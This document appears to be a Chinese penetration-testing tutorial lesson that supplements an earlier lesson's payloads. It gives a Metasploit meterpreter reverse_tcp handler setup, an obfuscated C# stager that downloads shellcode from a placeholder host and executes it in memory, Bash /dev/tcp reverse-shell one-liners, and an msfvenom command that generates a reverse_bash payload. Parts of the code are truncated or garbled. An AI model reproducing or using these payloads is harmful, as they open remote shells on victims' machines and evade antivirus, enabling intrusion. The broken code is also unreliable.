在实战中可能会遇到各种诉求 payload,并且可能遇到各种实际问题,如杀毒软件,防火墙拦截,特定端口通道,隧道等问题。这里我们根据第十课补充其中部分,其他内容后续补充。

这次主要补充了 C#,Bash

ps:在线代码高亮:http://tool.oschina.net/highlight

1、C#-payload

  1. msf > use exploit/multi/handler
  2. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  3. payload => windows/meterpreter/reverse_tcp
  4. msf exploit(handler) > set LHOST 192.168.1.107
  5. LHOST => 192.168.1.107

混淆:

  1. using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices; using System.
  2. namespace RkfCHtll { class LiNGeDokqnEH {
  3. static byte[] idCWVw(string VVUUJUQytjlL, int eMcukOUqFuHbUv) {
  4. IPEndPoint nlttgWAMdEQgAo = new IPEndPoint(IPAddress.Parse(VVUUJUQytjlL),
  5. eMcukOUqFuHbUv
  6. Socket fzTiwdk = new Socket(AddressFamily.InterNetwork,
  7. SocketType.Stream, ProtocolType.Tcp
  8. try { fzTiwdk.Connect(nlttgWAMdEQgAo);}
  9. catch { return null;}
  10. byte[] gJVVagJmu = new byte[4
  11. fzTiwdk.Receive(gJVVagJmu, 4, 0
  12. int GFxHorfhzft = BitConverter.ToInt32(gJVVagJmu, 0
  13. byte[] mwxyRsYNn = new byte[GFxHorfhzft + 5
  14. int yVcZAEmXaMszAc = 0;
  15. while (yVcZAEmXaMszAc < GFxHorfhzft)
  16. { yVcZAEmXaMszAc += fzTiwdk.Receive(mwxyRsYNn,yVcZAEmXaMszAc + 5, (GFxHorfhzft - yVcZAEmXaMszAc) < 4096
  17. byte[] XEvFDc = BitConverter.GetBytes((int)fzTiwdk.Handle
  18. Array.Copy(XEvFDc, 0, mwxyRsYNn, 1, 4 mwxyRsYNn[0] = 0xBF;
  19. return mwxyRsYNn;}
  20. static void hcvPkmyIZ(byte[] fPnfqu) {
  21. if (fPnfqu != null) {
  22. UInt32 hcoGPUltNcjK = VirtualAlloc(0,(UInt32)fPnfqu.Length, 0x1000, 0x40
  23. Marshal.Copy(fPnfqu, 0, (IntPtr)(hcoGPUltNcjK), fPnfqu.Length
  24. IntPtr xOxEPnqW = IntPtr.Zero;
  25. UInt32 ooiiZLMzO = 0;
  26. IntPtr wxPyud = IntPtr.Zero;
  27. xOxEPnqW = CreateThread(0, 0, hcoGPUltNcjK, wxPyud, 0, ref ooiiZLMzO
  28. WaitForSingleObject(xOxEPnqW, 0xFFFFFFFF }}
  29. static void Main(){
  30. byte[] dCwAid = null; dCwAid = idCWVw("xx.xx.xx.xx", xx
  31. hcvPkmyIZ(dCwAid }
  32. [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 qWBbOS,UInt32 HoKzSHMU, UInt [DllImport("kernel32")]private static extern
  33. IntPtr CreateThread(UInt32 tqUXybrozZ, UInt32 FMmVpwin, UInt32 H
  34. [DllImport("kernel32")] private static extern UInt32
  35. WaitForSingleObject(IntPtr CApwDwK, UInt32 uzGJUddCYTd

第十五课:基于第十课补充payload2 - 图1

2、Bash-payload

  1. i >& /dev/tcp/xx.xx.xx.xx/xx 0>&1

第十五课:基于第十课补充payload2 - 图2

  1. exec 5<>/dev/tcp/xx.xx.xx.xx/xx
  2. cat <&5 | while read line; do $line 2>&5 >&5;done

第十五课:基于第十课补充payload2 - 图3

附录:

msfvenom 生成 bash

  1. root@John:~# msfvenom -p cmd/unix/reverse_bash LHOST=xx.xx..xx.xx LPORT=xx > -f raw > payload.sh

参数简化
项目地址:
https://github.com/g0tmi1k/mpc
第十五课:基于第十课补充payload2 - 图4

Micropoor